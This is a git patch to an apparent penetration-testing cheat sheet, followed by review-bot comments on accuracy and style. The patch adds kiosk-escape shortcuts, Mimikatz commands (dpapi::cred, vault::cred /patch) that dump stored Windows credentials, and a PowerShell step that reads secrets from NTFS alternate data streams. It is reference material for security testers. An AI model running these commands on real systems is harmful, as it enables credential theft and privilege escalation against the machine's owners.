From 01aadf3a44317bf0fcac3f9f89838c87a828b816 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 13 Jan 2021 10:22:59 +0100 Subject: [PATCH] Alternate Data Stream --- Methodology and Resources/Escape Breakout.md | 3 ++- Methodology and Resources/Windows - Mimikatz.md | 8 +++++++- .../Windows - Privilege Escalation.md | 8 ++++++++ 3 files changed, 17 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Escape Breakout.md b/Methodology and Resources/Escape Breakout.md index 016f612..d5c9571 100644 --- a/Methodology and Resources/Escape Breakout.md +++ b/Methodology and Resources/Escape Breakout.md @@ -20,10 +20,11 @@ * **Shortcut** * [Window] + [R] -> cmd * [CTRL] + [ALT] + [SHIFT] -> Task Manager + * [CTRL] + [ALT] + [DELETE] -> Task Manager * **Access through file browser**: Browsing to the folder containing the binary (i.e. `C:\windows\system32\`), we can simply right click and `open` it * **Drag-and-drop**: dragging and dropping any file onto the cmd.exe * **Hyperlink**: `file:///c:/Windows/System32/cmd.exe` -* **Task Manager**: `File` > `New Task (Run...)` +* **Task Manager**: `File` > `New Task (Run...)` > `cmd` * **MSPAINT.exe** * Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels * Zoom in to make the following tasks easier diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index e76595c..7fad18a 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -190,7 +190,7 @@ $ mimikatz !sekurlsa::dpapi $ mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b ``` -Task Scheduled credentials +### Task Scheduled credentials ```powershell mimikatz(commandline) # vault::cred /patch 
@@ -204,6 +204,12 @@ Credential : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Attributes : 0 ``` +### Vault + +```powershell +vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\" +``` + ## Mimikatz - Commands list diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index bbc1af6..885bbbd 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -21,6 +21,7 @@ * [Sticky Notes passwords](#sticky-notes-passwords) * [Passwords stored in services](#passwords-stored-in-services) * [Powershell history](#powershell-history) + * [Password in Alternate Data Stream](#password-in-alternate-data-stream) * [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks) * [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services) * [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl) @@ -477,6 +478,13 @@ cat (Get-PSReadlineOption).HistorySavePath cat (Get-PSReadlineOption).HistorySavePath | sls passw ``` +### Password in Alternate Data Stream + +```ps1 +PS > Get-Item -path flag.txt -Stream * +PS > Get-Content -path flag.txt -Stream Flag +``` + ## EoP - Processes Enumeration and Tasks What processes are running?
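Review bot: in the Escape Breakout hunk, the new `* [CTRL] + [ALT] + [DELETE] -> Task Manager` entry overlaps with the `[CTRL] + [ALT] + [SHIFT] -> Task Manager` entry directly above it, and the arrow is imprecise: Ctrl+Alt+Delete opens the Windows security screen, from which Task Manager is one of the menu choices, rather than Task Manager itself. Suggest merging the two into a single shortcut entry (the direct Task Manager shortcut is Ctrl+Shift+Esc) and wording the new one as `-> security screen -> Task Manager`. The `File` > `New Task (Run...)` > `cmd` extension on the Task Manager bullet is fine as is.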
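Review bot: in the first Mimikatz hunk, the heading introduced by `+### Task Scheduled credentials` keeps the old line's word order; the Windows feature is called Scheduled Tasks, so `### Scheduled Task credentials` reads better and is easier to search for. Promoting the plain text line to a `###` heading is otherwise consistent with the `### Vault` heading added further down and with the `## Mimikatz - Commands list` section that follows.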
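Review bot: in the second Mimikatz hunk, `vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"` has an unbalanced trailing `"`, and the path ends in a backslash, so it names the Vault directory rather than a credential file; the `dpapi::cred /in:` example earlier in the same file gives a full file path and this one should too. Drop the stray quote, point `/in:` at a specific file under that directory (an obviously marked placeholder filename is fine if the real name varies per machine), and add a sentence saying whether `/patch` is required here as it is in the `vault::cred /patch` example above, since the two snippets otherwise look interchangeable.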
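Review bot: in the Privilege Escalation hunk, the new `### Password in Alternate Data Stream` section is two commands with no explanation, and `flag.txt` / `Flag` read as leftovers from a CTF rather than realistic names. Add a sentence stating that NTFS files can carry extra named streams beyond the default `:$DATA` stream, that `Get-Item -path flag.txt -Stream *` lists them (any `Stream` value other than `:$DATA` is the part worth looking at), and that `Flag` in the `Get-Content` line is a placeholder for whatever stream name that listing shows. Two style points: the fence is tagged `ps1` while the Mimikatz file in this same PR uses `powershell`, and `-path` should be `-Path` to match PowerShell's parameter casing used elsewhere in the file.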